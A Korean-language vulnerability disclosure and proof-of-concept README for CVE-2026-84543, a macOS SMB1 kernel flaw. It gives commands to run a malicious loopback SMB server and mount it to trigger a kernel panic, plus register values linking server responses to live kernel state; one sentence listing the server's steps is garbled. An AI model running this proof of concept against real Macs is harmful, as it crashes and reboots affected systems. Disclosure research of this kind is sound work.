
CVE-2026-84543에 대한 개념 증명 및 기술 공개로, 조작된 SMB1 응답을 통해 커널 패닉을 유발하는 macOS SMB 커널 취약점입니다.
이 개념 증명은 영향을 받는 Mac에서 커널 패닉을 일으키고 재부팅을 유발할 것으로 예상됩니다.
연구 중에 사용된 영향을 받는 테스트 빌드는 macOS Tahoe 26.4 (25E246)와 macOS 26.5 beta 4 (25F5068a)였습니다. Apple은 macOS Golden Gate 27, Tahoe 26.7, Sequoia 15.8에서 CVE-2026-84543을 수정했습니다.
smb1_unix_whoami_poc.py는 루프백 증거 수집 서버입니다. Python 표준 라이브러리만 사용하며 다음을 수행합니다:
_COMM_PAGE_ASB_TARGET_KERN_VALUE를 읽습니다;SMB_QFS_POSIX_WHOAMI (0x0202) 응답을 반환합니다; 그리고0x020B) 속성을 반환합니다.터미널 A에서:
cd poc
sudo python3 smb1_unix_whoami_poc.py \
--bind 127.0.0.1 \
--port 445 \
--log /tmp/CVE-2026-84543-poc.log
출력된 ASB_TARGET_KERN_VALUE를 기록하십시오; 이 값은 부팅 시 무작위화됩니다.
터미널 B에서:
mkdir -p ~/mnt/cve-2026-84543
mount_smbfs //[email protected]/share ~/mnt/cve-2026-84543
T가 부팅 시 출력된 커널 값 카나리와 같을 때:
x8 = T
x9 = T
x10 = T & 0x1ff
x11 = T
x12 = T & 0x7fffffff
x13 = 0
x14 = (T & 0x7fffffff) - 1
x8, x9, x11의 특정 비트가 출처를 확립합니다. 관찰된 관계는 서버의 응답 필드와 라이브 커널 레지스터 상태 사이의 바이트 단위 연결을 제공합니다.